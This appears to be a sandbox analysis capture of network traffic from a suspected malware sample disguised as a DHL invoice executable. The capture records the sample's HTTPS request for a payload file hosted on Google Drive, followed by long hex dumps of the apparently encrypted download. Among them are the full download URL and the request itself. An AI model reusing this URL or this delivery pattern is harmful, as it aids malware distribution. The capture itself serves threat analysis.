close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49831	142.250.186.129	443	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-10 17:13:00 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ca95q9srt742e8g9mee28t9fvcpi0rnq/1691687550000/04164905018868905653/*/1RkYk72jHuXza_mEHkFaPldPXcTgoFYZE?e=download&uuid=fd09c5b4-1c26-472b-8acd-937df6ec0e47 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Cache-Control: no-cache Host: doc-0s-3o-docs.googleusercontent.com Connection: Keep-Alive
2023-08-10 17:13:01 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdsCVQ3oubcYEeV8U-xHGHgS6u0QeVcxmh4BHwXwkqKPVO6-96CbnXjkWueMVr4umM7pX2hnReKqyOJblXM0ncRM0PXrD8Q1 X-Content-Type-Options: nosniff Content-Type: application/octet-stream Content-Disposition: attachment; filename="dNWrpcszLscQNsOEXGNHZ255.bin"; filename=UTF-8''dNWrpcszLscQNsOEXGNHZ255.bin Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 106560 Last-Modified: Thu, 10 Aug 2023 05:27:18 GMT Date: Thu, 10 Aug 2023 17:13:01 GMT Expires: Thu, 10 Aug 2023 17:13:01 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=WxeGIQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-08-10 17:13:01 UTC	6	IN	Data Raw: b2 53 ef 4c e3 a3 57 28 e8 61 df ed 27 ce 5d 91 96 9f 6c ec d6 1b 87 d1 d0 bc 2a e5 94 15 2e 9b b7 69 44 41 ed d9 6e 15 db b1 a1 c4 59 bc f7 c2 aa a7 c9 0a 40 7e f3 fe c2 4f cb 7b a9 8e 63 f9 bc e9 8d 6e 82 2b 6e 1e 2d 20 c9 e3 63 38 86 92 38 4d 2e a4 04 8e 57 41 09 b8 b3 7b c3 90 1b 20 1e 0b e5 75 d7 1e 91 85 ab 24 07 32 56 43 db 0a 77 97 49 f1 64 b0 d1 bc 3b 8e 6f 9d 9a ab 38 b3 8b 2a ee 41 f5 c6 cf b6 e2 1d 11 fa dc 5f 91 d9 ea 87 0b 5b c7 a9 ed 7b eb 78 fc 2c ce 29 6e 13 43 12 b0 93 73 eb 38 1b be 3e de 4f 90 2c 25 b1 67 81 f8 c9 ca 2a 93 ee 59 d2 68 c5 ea 19 ab 39 af ad 6c c5 0d 75 e2 c9 88 39 51 4f 88 01 92 9d f5 7e b9 00 14 a1 c0 5f 12 0f 5a 7a 31 f7 44 62 b2 3f b0 0f 09 c4 ee 9d 65 58 90 93 0d b1 77 5d 63 b0 7e c4 1f e5 52 8c a8 10 91 5a fe f5 f1 Data Ascii: SLW(a']l.iDAnY@~O{cn+n- c88M.WA{ u$2VCwId;o8A_[{x,)nCs8>O,%g*Yh9lu9QO~_Zz1Db?eXw]c~RZ
2023-08-10 17:13:01 UTC	10	IN	Data Raw: 3e 7b 7e 73 43 62 56 92 9a 11 06 77 ad d7 df 09 7f b4 24 a1 4e 6b 8f 73 49 1b 34 b3 5f 05 88 91 f4 45 2a 93 aa fd 10 f1 bf 00 af 3b cd 1e ef 3a 41 de 5b 3c 44 ab 2b 92 01 ac ff a9 25 bc dc 1d db af fa d3 c9 d8 c6 d2 5c 9c d8 20 2f a6 69 43 86 e0 c2 92 ee 45 d7 63 5f d2 de b8 28 b3 0b 85 d6 94 e3 f2 3e 37 c2 76 0d b3 d0 99 da 0d fc 8b 01 80 19 03 48 86 05 da 13 b2 22 75 a7 4c 93 61 8e e0 69 99 c9 75 c8 cb 2d 5b 84 fd b9 57 b9 ed 0f 77 8c 6b 3d 95 c7 b4 c3 43 94 3b 50 2b 77 e0 e6 3a a8 96 8e 22 9d 5a e0 33 09 5f 63 fa f1 38 b1 a7 ea e5 00 5d da 33 8e 15 37 6d 58 d0 c4 41 1e 89 af de b1 ef 25 e1 82 16 f4 84 86 7a 00 4c b5 8e fa e9 b8 93 46 d8 01 d0 de fb 58 e3 e4 3e 45 0c ec 68 ab 9d e3 31 d3 7d 98 b5 91 84 e8 92 1d 7b 90 c6 bf 85 f8 05 ed 5e 41 69 ab e3 00 Data Ascii: >{~sCbVw$NksI4_E*;:A[<D+%\ /iCEc_(>7vH"uLaiu-[Wwk=C;P+w:"Z3_c8]37mXA%zLFX>Eh1}{^Ai
2023-08-10 17:13:01 UTC	15	IN	Data Raw: 58 79 fb 26 2c f2 68 e3 ca 91 9d 12 5b cf 9d 1d fb 1c 68 cc 83 42 45 c3 40 42 e0 5c 6b 60 8e ca 9c 8a 2d 76 8b 53 36 b1 79 10 01 90 81 31 c2 8e 42 9f db e5 b6 05 08 9e 53 e3 64 69 10 9f 03 c8 fd fc cd 42 6e 9e b2 bd 8b e6 ae 2a e3 e9 f6 60 e5 bf 57 8f b4 57 af 9b cf 7f af b4 61 40 0c 48 bb e4 69 30 65 5e 99 1e 69 f3 29 0d 5a 80 ba 66 21 33 4c 4c d0 0d a5 fa 49 42 24 09 4a 59 09 df 46 d7 dc 76 44 66 2f 2f 9d 12 dc 61 15 bd 87 55 8f be 23 ac 5d 71 bf 47 f9 14 8b 3c 03 1f c1 5c 21 72 c9 98 7e b5 0b 51 30 73 31 34 6f ec cf 1e cf 4f 8a 07 ad 5b f6 6a 50 89 6c 2d 07 28 ed 71 ab fa f6 d0 08 32 f5 73 b9 e0 00 a9 36 90 df 94 80 8c a9 5f b5 2f a1 64 f3 bf 99 b4 2e ce f3 34 5b 14 f5 71 0c b5 9f 35 1a 41 d0 84 87 7b 11 74 a1 1d 3f c8 7d e6 66 a6 c9 d1 40 22 9e b8 24 Data Ascii: Xy&,h[hBE@B\k`-vS6y1BSdiBn*`WWa@Hi0e^i)Zf!3LLIB$JYFvDf//aU#]qG<\!r~Q0s14oO[jPl-(q2s6_/d.4[q5A{t?}f@"$
2023-08-10 17:13:01 UTC	18	IN	Data Raw: 93 0a ee fa 29 2d 53 9d eb ca 13 e3 88 e2 2a 79 36 d4 a0 9d 78 81 50 a7 6c 85 5c 33 f0 c7 ee 8c 38 74 aa 2c 26 9c 84 95 fe d2 ed 15 5e f8 4b d9 82 33 1a 60 d6 8f eb bb 38 50 e1 62 b7 c5 09 ea b1 ef 95 2b 71 18 04 54 a4 e0 b0 1d 74 34 51 ef 0a e2 79 44 5e eb 09 20 80 07 3b 1c c9 fc 83 bf 5a 1e 5e 6f 00 f9 c7 ed fb cb 76 e2 cf f9 f1 b4 77 70 dd 6a 51 c6 42 a4 76 63 7e d0 b6 c5 58 69 da 46 51 cb b5 92 6d b7 e6 f8 ce f6 ac 1b b9 4e 67 1d 2f 0f f6 24 3f 0b 8d d9 cb 69 07 4e 3f 42 52 50 ab cb 5d 43 d8 aa 0f 89 27 28 da c2 a9 79 6f f0 56 8c 5f 9c 32 db 15 78 a1 59 e1 d1 94 b1 db 66 0b ad 54 16 ce eb 5d 67 bb 75 18 20 f1 61 e1 8b 84 ec f7 8b cf 26 82 8a 02 ef 3f 78 b3 5e 40 87 8b f8 9f b6 74 dd 75 2a 6a ce 31 f3 bf c1 ee e5 0f 7e ea 3d e6 2d ef 65 fa f0 bc ac 0b Data Ascii: )-Sy6xPl\38t,&^K3`8Pb+qTt4QyD^ ;Z^ovwpjQBvc~XiFQmNg/$?iN?BRP]C'(yoV_2xYfT]gu a&?x^@tuj1~=-e
2023-08-10 17:13:01 UTC	19	IN	Data Raw: c9 bc 07 18 1d 61 bd 8d 99 bd 6d 29 f0 ab 52 07 99 e7 80 e2 c9 a1 93 be 93 e5 06 e0 bd 2b b2 cf 76 34 02 27 c7 11 59 e8 7e f2 b4 40 c1 ec f6 2d f9 c9 be f9 f1 93 3f 25 f1 84 f6 17 25 4f 6f 51 d4 73 1d 73 d2 ce 00 d2 86 a9 96 57 00 07 8f bc 12 45 c2 5d 91 15 98 e9 66 5d f2 2b 34 1d cc 5f 79 0f 37 c3 cf b5 0b 4f 19 39 87 35 70 56 f6 99 89 6f 0c 40 e0 e1 41 39 64 b3 40 d3 74 f3 23 bd 31 a0 c2 7f c6 ee 6c f9 38 a4 7e 59 4d 52 ae e4 a3 75 1f 74 04 52 de 67 15 ad f1 d9 aa 67 b4 e4 60 b7 6d aa 30 90 fc f2 5a fa 2c 2e 2b 9b 4a 3c c7 7a 19 fd 16 cf df 53 5c 9f 59 f8 20 56 96 4c c9 79 1e 17 5d 3f 16 e2 8a ec a2 15 f8 3e af d3 aa 6a da f7 8b e3 39 6d ba 92 67 aa 1b f1 01 3d 35 a3 27 3a 3f 45 39 da 4a 0f 72 c3 e9 e6 9f 5c 3a b1 72 84 dd e4 b5 82 b5 2d d6 86 00 8d 5e Data Ascii: am)R+v4'Y~@-?%%OoQssWE]f]+4_y7O95pVo@A9d@t#1l8~YMRutRgg`m0Z,.+J<zS\Y VLy]?>j9mg=5':?E9Jr\:r-^
2023-08-10 17:13:01 UTC	20	IN	Data Raw: 0a 19 5f e0 6b 13 90 7c ef 5c 5e 1e 58 97 e4 3b c4 26 e5 81 57 7f c9 6b db b3 f1 c7 a3 08 d8 66 e3 22 4a f1 90 f4 3d cf a7 96 a2 e5 99 51 c4 95 79 cc 7b 14 d9 86 c0 9a 19 60 3d 5c 63 da 96 78 c1 22 23 e6 ff fe ed 1c 18 bf e8 ce 48 39 91 c1 c7 03 0e f3 ad 31 73 a0 fb 64 97 83 fc 0b 82 91 23 b3 40 e5 b8 67 a2 9a 8b f2 fe 16 f0 9a 1c 8d e4 01 ae 00 f3 a2 c1 1a 34 b0 ea f1 af 14 1b 30 ae fe aa 1a b9 8c 70 7a 9a cc 97 0f c7 c8 dc 10 b1 6c e6 ce 47 a3 ce 13 f5 7a 7e 02 cc 8c 49 d4 35 02 a8 b7 64 0e 85 55 39 29 a5 93 6b 56 ee d6 8e a1 47 d6 09 5d f6 fb 92 44 fd 92 f1 d9 aa 05 d0 b7 31 d6 22 cc ac e5 57 57 9a ed af f2 bb 1a a7 e0 f8 df 18 49 39 45 a3 3e 23 a0 04 f0 a4 53 cd 79 5b 4f f9 ab 3d 5d 9f e3 14 1b 17 ac 21 34 84 77 02 0f fa f1 6e da 3f 6b b6 42 0a 85 86 Data Ascii: _k\|\^X;&Wkf"J=Qy{`=\cx"#H91sd#@g40pzlGz~I5dU9)kVG]D1"WWI9E>#Sy[O=]!4wn?kB
2023-08-10 17:13:01 UTC	21	IN	Data Raw: fb ef 96 34 0c 3e 40 7a 56 40 ad d4 a0 82 e1 5c 28 21 ac 63 38 79 cb 05 8d 5b a6 59 4d 07 2b 49 47 c6 77 2b 8e e4 df e1 88 21 79 8a dd c4 0e 47 a5 eb 36 57 43 db 87 f2 6b b7 0e 9b 4f a4 b0 c4 fb 67 cd 82 02 38 b3 85 ca 21 5f 78 f7 3a 85 3c 5a ef c3 09 81 b0 a5 d3 1c 76 2b b5 c6 09 cd 96 9e 39 12 6c 12 8b 90 64 64 59 83 5b 13 cb 75 9f 57 b0 e5 6a 62 77 91 0a e1 2a 7c 6c 62 95 6e 61 e0 6a 3e e5 af 64 b3 67 51 9c 3f b7 51 e8 55 0f 23 8f ed b6 6e 87 f8 ff ef 20 2c 7c f2 d6 f2 59 26 1d e6 8b 53 d8 8a 34 61 69 2a 3e 69 f9 30 58 e2 e5 3e 87 1d 61 ae b0 41 ab 3c 18 a5 12 aa 5c d4 97 01 03 70 b4 0a be fc 50 c9 1d 5c 0f d6 ce 1f ac 3a b1 1b 47 e7 8e c9 9c 27 a3 47 c4 3c c5 70 02 83 02 e7 44 cf d6 09 69 d8 74 77 ff 42 3e ea d6 6b d6 03 b9 12 01 ed 13 96 39 38 b0 24 Data Ascii: 4>@zV@\(!c8y[YM+IGw+!yG6WCkOg8!_x:<Zv+9lddY[uWjbw\|lbnaj>dgQ?QU#n ,\|Y&S4ai>i0X>aA<\pP\:G'G<pDitwB>k98$
2023-08-10 17:13:01 UTC	22	IN	Data Raw: 3b 3c 18 4c 39 8f b4 ea 57 f2 bc ad c2 9b d8 e1 3f ab db 0d e5 03 d1 47 d8 e4 92 83 2c 9f a5 54 75 71 dd 1a 50 f3 cf 68 df f7 2f 85 85 b7 b1 5c d7 bc ce e6 eb 70 95 76 44 17 3c 77 3a 73 80 85 cd 10 73 33 b6 92 59 32 8b 46 af f4 0d 79 de 34 af 67 9c da c4 d5 70 d3 b0 b4 cb b8 22 47 f7 61 d6 be a5 9a 17 e3 1b 18 1b 67 ec 7d 7d 52 6c 53 a3 68 bc 2c b8 8a bd 1d b7 1c 51 ba c9 67 40 b1 38 a2 1c 07 74 67 8c 5e 44 66 db 49 dc 8e 39 91 67 ec e1 46 4c 30 27 ee 78 87 b2 36 25 43 e9 ff 32 e6 c1 13 e3 94 2c 54 43 f1 d6 d8 17 55 64 61 ab 8d f3 3c 80 a1 31 31 a7 a3 f2 33 cc ed a5 fd 1d b3 3d 87 ac b0 a9 bd 81 22 2b 48 7c 9c 49 d0 77 a7 44 a7 ef c8 c3 92 39 ab 93 e4 1a b0 84 7c 5c 70 90 df 06 1a 4d 9c fc be 6b e6 ea 14 35 b3 b1 53 56 08 45 6d 8c 3a fd c5 53 15 dd b6 d6 Data Ascii: ;<L9W?G,TuqPh/\pvD<w:ss3Y2Fy4gp"Gag}}RlSh,Qg@8tg^DfI9gFL0'x6%C2,TCUda<113="+H\|IwD9\|\pMk5SVEm:S
2023-08-10 17:13:01 UTC	24	IN	Data Raw: 69 5a 10 c9 da 43 cf e9 18 c1 c7 fd 3c 45 a7 fb 24 b6 7c 38 52 ea 3f e7 31 9c 9d d1 04 33 1e b8 19 b1 e8 14 16 61 07 d4 dd 26 09 22 dd 98 e4 14 f5 89 2c c4 02 c2 0f 3f b1 ef 25 b7 ec d9 95 a4 78 e8 80 f6 a0 02 19 b7 bb 10 23 1d 45 7d a3 fc 51 ee 1b 6e c8 c2 a4 c5 ce 3e 98 b8 68 a0 ee 84 86 e5 d8 61 67 30 d3 66 3f d2 a9 8e a0 a8 95 8c 10 91 51 ea f8 a7 31 d2 e2 69 44 fe 46 d4 20 56 bf 1e a7 82 25 2d 8d af 25 b1 db 92 24 6b 58 d6 34 9a d8 62 a4 be 89 20 1a 94 10 2c 6d 30 39 56 7f e1 95 fe e2 cf 6e b9 5a 44 98 0d 34 d3 74 4f c9 55 6b 1e d9 2c f1 43 21 3f 74 bb 9e e4 b1 ce ff b5 f4 a4 1c af 38 4f a2 81 ad 1d 10 92 aa c1 32 a5 3c f8 d3 38 eb 7f 1e 92 4c 47 5d ef ae 50 77 7a dc 9a 6c 6d b7 83 ad 4b 3d 3f 65 e6 25 1f c9 11 80 fa c4 9f 64 06 a0 9b 01 8c 4f 7a 8d Data Ascii: iZC<E$\|8R?13a&",?%x#E}Qn>hag0f?Q1iDF V%-%$kX4b ,m09VnZD4tOUk,C!?t8O2<8LG]PwzlmK=?e%dOz
2023-08-10 17:13:01 UTC	25	IN	Data Raw: 0c 64 8c b8 b2 fa e3 20 a2 4b 13 74 7b 78 05 12 3e 66 a4 29 45 f4 ee 98 90 cb 4a 15 fa 1e 4c 85 52 d5 35 c7 7e 74 0a a0 bb ef a8 34 d5 76 af 08 75 00 83 97 10 99 52 a5 97 fe 6f e8 36 62 19 88 73 04 85 42 30 c3 d8 f1 7e 06 f4 73 7d ec 96 40 51 d9 d3 46 48 8e b0 a2 0a 60 35 5d 10 a1 2b 4e 74 6e 84 12 a6 54 a8 64 73 29 8c ed 39 f2 f2 97 46 14 78 9a 18 df 9e 62 96 90 b5 2d 37 84 bb 96 28 89 28 a9 25 6f 24 bf ea cb 91 6e ad 7f b2 d1 fd 5d 05 11 49 4a be e4 84 b6 9c 4b c8 43 d8 1a 8a d6 60 99 06 6f 28 34 f2 16 1d 30 08 44 57 16 ac a7 e5 5a 50 6d 05 1a 91 3d 2e ce c7 cd 63 bc 7c f0 72 c6 22 46 65 64 8b 47 96 aa 54 7c 0b 72 ae 75 b2 b8 8a ef 19 dc c2 ea 4b 6a 7d 67 64 3a 5c bb 66 b2 fe 66 d4 74 63 51 9c 02 88 81 ab 90 29 24 53 8c 67 00 c6 68 b1 f8 20 ee 2d 10 6d Data Ascii: d Kt{x>f)EJLR5~t4vuRo6bsB0~s}@QFH`5]+NtnTds)9Fxb-7((%o$n]IJKC`o(40DWZPm=.c\|r"FedGT\|ruKj}gd:\fftcQ)$Sgh -m
2023-08-10 17:13:01 UTC	26	IN	Data Raw: 92 8d cf 94 d3 30 1f 72 50 dc 0d 78 c5 6a 1f 98 e9 d9 0a 94 f8 e4 90 bd 1d ee 44 bf da 1c d6 40 f0 b2 4d c1 10 b9 06 ab e3 d3 27 92 e8 72 f6 3c 62 a2 9d 8b 67 df 83 a0 71 1d 4e 1c 3c 36 ef 9e b1 28 f8 f6 88 c0 19 3f 56 fc b0 0c de e1 ff e1 d8 81 03 a7 36 09 46 ac 46 5d a1 16 11 cf ce 45 2c 3f 44 f2 39 e2 3e 32 7a 46 a5 a9 48 0a 8f fa 5b 31 68 c0 1f 39 81 4b 59 9c 25 05 19 de 43 5a 21 dd 3f ee d4 38 92 e6 7d ab 9f 3c d0 9a bd 86 46 2d 3b 7f 61 40 8a bd 40 bf 2f c2 cf 10 c7 06 a7 7a 7a ee da bc 58 f9 c6 da ab 77 2e 30 f1 26 3c 03 fc 4f 19 23 28 c8 46 fc 4d fa 03 71 8b 10 10 48 48 81 8e 9b cf dc fa 6b f5 d5 0c 94 68 21 f4 c2 ae cf 2a 9e 29 e9 1a ce 3a f4 fe 41 e4 51 2f de d1 20 10 02 f9 3e 54 b4 35 9d 68 8a 7b 23 92 20 56 09 de 2d 33 72 ad 3b 54 e4 9f c0 39 Data Ascii: 0rPxjD@M'r<bgqN<6(?V6FF]E,?D9>2zFH[1h9KY%CZ!?8}<F-;a@@/zzXw.0&<O#(FMqHHkh!*):AQ/ >T5h{# V-3r;T9
2023-08-10 17:13:01 UTC	27	IN	Data Raw: 5f b2 85 9b 95 63 a2 57 fa 02 08 23 65 c4 c2 22 a1 14 78 32 9d 10 14 48 e3 c2 cc 93 2a f6 12 f8 d4 42 75 9d 23 02 78 67 68 06 15 1f 36 e2 77 ae 75 7d 01 e4 48 0b 59 a6 d8 3a 25 3e c7 6e bb 16 81 f3 1b f4 8e ea f0 cd 24 4b 29 6b 43 56 43 e2 65 89 78 c0 e4 cf 8a f2 2c 3b 3a c7 ca 2b 72 d0 8f 22 90 76 15 a0 de ac b1 24 6d d5 0d 44 a9 76 04 f0 74 c8 5f 5c 7d ff cc 93 1b b8 58 aa d9 b5 48 b1 11 ac 9d 6d 93 c3 ed 4c 48 ee cf 72 e4 2b 9d 71 55 73 a7 2b 70 f2 71 0c cb 17 e1 0f a9 2f 83 c9 03 58 4c ba 2c 3c bb bf 26 32 d2 93 34 2f 51 f4 d1 5a 38 62 3a e7 7c 38 44 d8 f7 f6 43 1a 48 6a 08 08 6f ba d8 20 21 60 ce 62 f5 8f ee 41 24 6d 6c 31 45 2c 4a 99 95 10 1e 18 c1 28 78 2d fe d9 4b 46 07 fb f7 7e f6 61 08 4f ba 47 e1 1f 8c 5f 3f 45 45 d3 75 16 f1 7d 78 ee 45 53 56 Data Ascii: _cW#e"x2H*Bu#xgh6wu}HY:%>n$K)kCVCex,;:+r"v$mDvt_\}XHmLHr+qUs+pq/XL,<&24/QZ8b:\|8DCHjo !`bA$ml1E,J(x-KF~aOG_?EEu}xESV
2023-08-10 17:13:01 UTC	29	IN	Data Raw: 5b d2 3d 2e f0 56 27 e1 6f 80 fa 4c cb b0 80 6f 23 a9 98 63 0b 33 89 48 f5 eb b5 0b d1 c3 4d a3 7c 57 01 5c 68 d2 9c d8 39 86 dd 7e f0 44 39 77 8e 04 8d f1 db 4c b4 d4 5c 96 f3 9e a7 ca e5 46 c9 12 42 26 a1 aa 69 78 e0 79 9a 9a a2 c1 e9 62 3e d0 02 d2 b6 d0 67 13 46 60 d2 4f e0 74 e4 ae c7 24 d3 2c 6a 45 9b 18 95 0f 99 ed 45 5b 9b 5a 1d 96 f8 66 9b 8d d9 9b 73 be ef 57 98 04 29 3b 77 e1 2c 7b 05 f0 2e 66 a4 55 f7 f0 98 db 3b 74 fd ae 51 4d b0 74 d0 85 09 57 4a b8 35 a4 e8 94 3d a5 d1 fc 55 b7 d5 0f 27 1a 5e 49 2d b7 97 74 f6 6a bf 3a a6 71 5f 04 85 1b e2 b0 ad b5 f6 52 91 5b 96 d2 34 56 c4 1d c3 10 98 c5 28 c2 e6 1a bf ae bf d5 1b ba 77 6c 6c ff 69 28 93 5b ee b3 86 38 5e 94 d2 58 13 c8 e0 20 7f ae dd d4 b2 b7 d4 13 47 86 0c c4 04 88 a2 33 e6 a0 7d 35 0b Data Ascii: [=.V'oLo#c3HM\|W\h9~D9wL\FB&ixyb>gF`Ot$,jEE[ZfsW);w,{.fU;tQMtWJ5=U'^I-tj:q_R[4V(wlli([8^X G3}5
2023-08-10 17:13:01 UTC	30	IN	Data Raw: 11 29 0d f5 32 da 3d 79 59 8e 97 25 72 46 fa 35 79 4c e8 e4 bf 7a a5 a7 ab e4 99 97 81 c1 8e 08 be 31 6d 70 63 87 55 f3 5e e3 04 55 77 bf 47 f9 bc 8b 32 03 1f c1 52 48 ff dd 67 d1 1b df be 4f ea 47 4e 1b fb fa eb 97 29 0c 35 1c de f6 6a c5 89 fd 21 8c 2e 1b ea 0e f2 27 1f fe 7a bf 88 4d d7 ae 27 e7 ed 12 94 f4 83 4c 12 1c 92 a8 ef 52 3d 93 05 ab ce f3 ad 5f 9d 82 46 f3 4a f9 ed e5 5b 79 93 72 dd 67 16 80 55 45 4d e4 90 14 c6 c9 5b 3b 76 81 4d d9 e7 35 cc bc 18 51 81 8c aa 3b 42 38 ff 39 77 f8 46 77 dc 53 96 32 1e 8f 0f 62 e3 d6 b9 44 47 89 ef 73 73 7b f1 66 63 00 19 3a e9 61 04 1e 00 1e e0 ba 55 4a d2 a4 f8 53 22 75 15 c6 4e 91 1e 3e 90 3b 02 ec 5d 36 97 25 7f c3 f5 56 e7 78 4f 65 59 9f 7f 9c 88 2d 9b 9d 16 60 ce 79 53 c9 70 fb f0 88 b5 4e 95 b1 a2 c8 1d Data Ascii: )2=yY%rF5yLz1mpcU^UwG2RHgOGN)5j!.'zM'LR=_FJ[yrgUEM[;vM5Q;B89wFwS2bDGss{fc:aUJS"uN>;]6%VxOeY-`ySpN
2023-08-10 17:13:01 UTC	31	IN	Data Raw: b3 2b fe 4e a0 76 cf 37 6a 01 d3 d9 72 16 1b 3e 18 da bf e4 22 78 75 9b 49 c2 6c 57 c3 a6 d1 7f 6e 5a 79 34 e6 ab 18 6a df 30 a1 a5 7e 06 d5 69 8f 3c be 17 d4 e9 e9 5c 1b d6 0b f3 ba d3 d0 51 b2 3f 76 c5 fd 31 9f dc f5 03 f5 c4 61 8b 9d ed a0 b1 be 52 5e d0 a4 c6 0d ef 7e 2f d6 15 a3 eb 64 a1 85 eb d5 58 dc 3d 3e ce 5f 9e e7 02 24 f6 17 91 e9 f0 4a 3d 70 eb 93 34 47 f0 75 f9 0c c8 7d 33 88 56 55 02 f1 91 c8 19 94 ae 3d 48 43 b6 89 7f 56 07 05 ab 75 1b 87 6c 7b b4 a0 27 2d e7 24 f3 5b 02 fc 5d 75 83 4c e7 c1 05 fd 38 b9 c7 a7 6b 11 41 bf ce 3b c3 1e 6a 2e ab a3 a6 f3 91 80 1f fd 3e ba 26 93 aa 72 68 b7 3c fe c2 17 c7 b0 bc f4 47 14 43 70 35 d4 b7 19 29 d1 00 0e 55 fe 73 b2 56 b2 a2 28 87 2d 02 38 71 71 03 16 0f 6d 65 9b 8f 58 c1 77 cd a2 43 af f4 0f be ac Data Ascii: +Nv7jr>"xuIlWnZy4j0~i<\Q?v1aR^~/dX=>_$J=p4Gu}3VU=HCVul{'-$[]uL8kA;j.>&rh<GCp5)UsV(-8qqmeXwC
2023-08-10 17:13:01 UTC	32	IN	Data Raw: 37 15 6e df 38 68 76 fa 3e da 78 6f 28 c2 ec b1 d8 3f 73 ec b5 c1 41 34 cb 94 57 e4 46 74 5f 29 d0 0f a5 dc 2e 99 95 c3 8b f0 7c b4 7e 75 78 97 28 82 f4 f5 69 c5 fe 57 c2 a6 c7 f9 27 8b f6 19 12 92 6e cb 5f e2 b9 46 fc 28 4f 97 4d 55 86 74 81 7a e5 7d 33 88 77 fa ea 95 be b6 04 b6 35 b6 4a e7 1b c4 0f ef 3c 18 ce 9e a1 8e b0 81 35 b8 40 8c 24 25 9f c6 18 15 fe b4 46 f2 f3 45 f3 07 ac a4 24 c8 3a 54 99 25 a5 da 8c 04 1b 7d 0f 4e aa 56 1f f4 e3 c0 d9 68 83 5b ba 87 e0 68 32 65 ec f8 75 c1 a4 3f 44 ac b2 1c 91 a3 72 e8 bb 7e 88 b9 67 1e 53 0f cb 2a 5e 26 91 9a 43 9b 69 6c 55 0a 8c 05 c4 9c c2 46 47 f9 9c 44 ca 04 66 33 3a 3c 16 7d 98 33 89 96 61 b3 47 e9 f5 00 ba 30 05 8a c8 07 a4 9b 1e 59 bd f2 75 d8 b0 97 20 72 6a 4b 9b 06 29 92 c7 da 6b af 2d 69 d9 df 60 Data Ascii: 7n8hv>xo(?sA4WFt_).\|~ux(iW'n_F(OMUtz}3w5J<5@$%FE$:T%}NVh[h2eu?Dr~gS*^&CilUFGDf3:<}3aG0Yu rjK)k-i`
